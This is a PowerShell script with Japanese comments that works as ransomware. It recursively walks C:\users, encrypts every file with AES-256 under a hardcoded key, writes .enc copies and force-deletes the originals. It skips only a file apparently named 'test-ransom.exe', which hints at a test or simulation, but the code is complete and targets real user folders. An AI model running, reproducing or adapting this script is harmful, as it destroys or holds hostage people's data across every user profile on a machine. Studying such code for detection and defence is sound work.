function Base642Byte( $Base64 ){
    return [System.Convert]::FromBase64String($Base64)
}

function AESEncrypto($ByteKey, $BytePlain){
    Add-Type -AssemblyName System.Security
    $AES = New-Object System.Security.Cryptography.AesCryptoServiceProvider
    $AES.KeySize = 256
    $AES.BlockSize = 128
    $AES.Mode = "CBC"
    $AES.Padding = "PKCS7"
    $AES.GenerateIV()
    $IV = $AES.IV
    $AES.Key = $ByteKey
    $Encryptor = $AES.CreateEncryptor()
    $Encrypted = $Encryptor.TransformFinalBlock($BytePlain, 0, $BytePlain.Length)
    $Encryptor.Dispose()
    $AES.Dispose()
    return $IV + $Encrypted
}

function RenameAndEncryptFiles($targetFolder, $Base64Key) {
    $ByteKey = Base642Byte $Base64Key

    if ($ByteKey.Length -ne 32) {
        Write-Host "[FAIL] 鍵の長さが256ビットではありません"
        return
    }

    $files = Get-ChildItem -Path $targetFolder -File -Recurse

    foreach ($file in $files) {
        if ($file.Name -ne "test-ransom.exe" -and $file.Extension -ne ".enc") {
            try {
                Write-Host "[INFO] Encrypting: $($file.FullName)"

                # ファイルを読み込む
                $plainBytes = [System.IO.File]::ReadAllBytes($file.FullName)

                # 暗号化
                $encryptedBytes = AESEncrypto $ByteKey $plainBytes

                # 新しいファイル名に .enc を追加
                $newFilePath = "$($file.FullName).enc"

                # 暗号化データを書き出し
                [System.IO.File]::WriteAllBytes($newFilePath, $encryptedBytes)

                # 元ファイル削除（任意）
                Remove-Item -Path $file.FullName -Force

            } catch {
                Write-Host "[ERROR] $($file.FullName) : $_"
            }
        }
    }
}

# --- 使用例 ---

# 対象フォルダ
$targetFolder = "C:\users"

# Base64形式の256bit鍵（32バイト）をここに貼り付ける
$base64Key = "MTExMTExMTExMTIyMjIyMjIyMjIzMzMzMzMzMzMzNDQ="

# 暗号化実行
RenameAndEncryptFiles $targetFolder $base64Key

Write-Host "Finish"